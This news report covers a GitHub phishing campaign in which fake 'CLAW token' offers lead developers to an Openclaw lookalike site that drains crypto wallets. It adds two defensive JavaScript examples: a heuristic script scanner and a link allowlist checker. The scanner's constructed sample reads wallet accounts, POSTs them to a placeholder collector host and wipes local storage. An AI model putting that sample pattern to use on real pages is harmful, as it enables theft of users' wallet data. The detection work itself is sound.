OX Security, a cyber security company, has revealed a new phishing campaign targeting crypto developers. The attack was reportedly carried out through fake GitHub accounts imitating the Openclaw ecosystem, with developers contacted directly. Notably, users active in open source projects were singled out as targets.
Reaching Developers with the Promise of Fake Tokens
The attackers reportedly opened issues in GitHub repositories, tagged users in them, and claimed that the tagged users had earned so-called CLAW tokens worth $5,000. The links in these messages lead to a fake web page that closely resembles openclaw.ai. Once the user approves the wallet connection request on this fake page, malicious transactions are initiated.
Assets Are at Risk After Wallet Connection
In the technical review conducted by OX Security researchers Moshe Siman Tov Bustan and Nir Zadok, it was stated that user assets could be drained after the wallet connection. The attack is believed to have been made to appear personalized through social engineering, and it may have specifically targeted users who had previously interacted with Openclaw-related projects.
Infrastructure and Malicious Code Details Revealed
Technical analysis revealed that the attack infrastructure included redirect chains and control servers. Users were redirected through the domain token-claw[.]watery-compost[.]xyz, and a command-and-control server hosted on a [.]today domain was found to be active. The malicious JavaScript code was determined to collect data such as wallet addresses and transaction details and transmit it to the attackers.
Researchers stated that a crypto wallet address thought to be linked to the threat actor was also identified. Functions within the code that monitor user behavior and clear local storage data make the attack harder to trace.
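The behaviours attributed to the malicious script above (reading the wallet provider, posting collected data to an outside host, wiping local storage) are the kind of indicators a defender can look for when triaging a suspicious page's JavaScript. The following is an added example, not code from the OX Security report or the Openclaw project: a small heuristic scanner that runs over script source text and reports which indicators it finds. The indicator patterns, the allowlisted site host and the sample script are constructed for illustration; the collector hostname is a placeholder.

```javascript
// Added example, not from the report: heuristic static scan of page scripts for
// wallet access, exfiltration to an outside host and local storage wiping.
// Patterns, SITE_HOSTS and SAMPLE_SCRIPT are constructed for illustration.

const INDICATORS = [
  {
    name: "wallet-provider-access",
    re: /window\.ethereum|\.request\(\s*\{\s*method:\s*["']eth_requestAccounts["']/,
  },
  {
    name: "outbound-post",
    re: /fetch\(\s*["'`]https?:\/\/[^"'`]+["'`]\s*,\s*\{[^}]*method:\s*["']POST["']/s,
  },
  { name: "local-storage-wipe", re: /localStorage\.(clear|removeItem)\(/ },
  { name: "send-beacon", re: /navigator\.sendBeacon\(/ },
];

// Hosts the page itself is expected to talk to; anything else receiving a
// POST is treated as an external target.
const SITE_HOSTS = new Set(["openclaw.ai"]);

// Hostnames of every fetch() target in the script that is not an allowlisted
// site host. Unparseable URLs are skipped.
function externalPostTargets(src) {
  const re = /fetch\(\s*["'`](https?:\/\/[^"'`]+)["'`]/g;
  const out = [];
  for (const m of src.matchAll(re)) {
    try {
      const host = new URL(m[1]).hostname.toLowerCase();
      if (!SITE_HOSTS.has(host)) out.push(host);
    } catch {
      // malformed literal; ignore
    }
  }
  return out;
}

// Returns the indicator names that matched, the external hosts contacted, and a
// verdict: wallet access combined with a POST to an outside host is the
// combination that warrants a closer look.
function scanScript(src) {
  const hits = INDICATORS.filter((i) => i.re.test(src)).map((i) => i.name);
  const externalHosts = externalPostTargets(src);
  const suspicious =
    hits.includes("wallet-provider-access") && externalHosts.length > 0;
  return { hits, externalHosts, suspicious };
}

// Constructed sample shaped like the behaviour the report describes; the
// collector host is a placeholder, not an indicator from the report.
const SAMPLE_SCRIPT = `
async function connect() {
  const accounts = await window.ethereum.request({ method: "eth_requestAccounts" });
  await fetch("https://collector.example.invalid/api", {
    method: "POST",
    body: JSON.stringify({ accounts }),
  });
  localStorage.clear();
}
`;

console.log(JSON.stringify(scanScript(SAMPLE_SCRIPT), null, 2));
```

Regex heuristics of this kind are a triage aid, not a verdict: obfuscated scripts will evade them, and a legitimate dApp legitimately calls `eth_requestAccounts`. The useful signal is the combination of wallet access with data leaving for a host the site has no business contacting, which is why the verdict keys on that pair rather than on any single match.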
Although no victims have been confirmed so far, the campaign is reported to be still active. Users are advised not to connect their wallets to sites they do not know and to be cautious about unexpected token offers arriving through GitHub.
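The advice above comes down to checking where a link actually points before approving any wallet connection. As an added example (not code from the report or the Openclaw project), the block below extracts the URLs from an issue body and classifies each host against a small allowlist, flagging lookalikes that borrow the brand name. The allowlist, the brand keywords and the sample issue text are constructed for illustration; the redirect domain is the one named in the report, written in defanged form.

```javascript
// Added example, not from the report: classify links in an issue body against
// an allowlist of known project hosts and flag lookalike domains.
// TRUSTED_HOSTS, BRAND_KEYWORDS and SAMPLE_ISSUE are constructed.

const TRUSTED_HOSTS = new Set(["openclaw.ai", "www.openclaw.ai"]);
const BRAND_KEYWORDS = ["openclaw", "claw"];

// Indicator lists are usually defanged ("example[.]com"); restore the dots so
// the URL parser accepts them.
function refang(s) {
  return s.replace(/\[\.\]/g, ".");
}

// Lower-case hostname of a URL, or null if it does not parse.
function hostOf(rawUrl) {
  try {
    return new URL(refang(rawUrl)).hostname.toLowerCase();
  } catch {
    return null;
  }
}

// "trusted": exact allowlist match; "lookalike": any other host that borrows a
// brand keyword (also catches subdomain tricks such as openclaw.ai.evil.example);
// "untrusted": everything else; "invalid": could not be parsed.
function classifyLink(rawUrl) {
  const host = hostOf(rawUrl);
  if (host === null) return "invalid";
  if (TRUSTED_HOSTS.has(host)) return "trusted";
  if (BRAND_KEYWORDS.some((k) => host.includes(k))) return "lookalike";
  return "untrusted";
}

// Pull every http(s) URL out of free text and classify it.
function scanText(text) {
  const urlRe = /https?:\/\/[^\s)>"']+/g;
  return (text.match(urlRe) || []).map((url) => ({
    url,
    verdict: classifyLink(url),
  }));
}

// Constructed issue body shaped like the lure the report describes.
const SAMPLE_ISSUE = [
  "@dev Congrats, you earned 5,000 CLAW tokens!",
  "Claim here: https://token-claw[.]watery-compost[.]xyz/claim",
  "Docs: https://openclaw.ai/docs",
].join("\n");

console.log(JSON.stringify(scanText(SAMPLE_ISSUE), null, 2));
```

The exact-match allowlist is the important part: a lookalike host that merely contains the brand name is never promoted to trusted, and a host that matches nothing is still reported as untrusted rather than silently ignored.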
Separately, a report published by Certik drew attention to “skill scanning” vulnerabilities around the Openclaw system: in a sample application examined, a vulnerability was found that could bypass the system's security layer and could be exploited.
Openclaw, a platform for developing artificial intelligence-based agent systems, has rapidly gained popularity among developers. With that growing interest, such platforms appear to be becoming more attractive targets for cyber attacks.
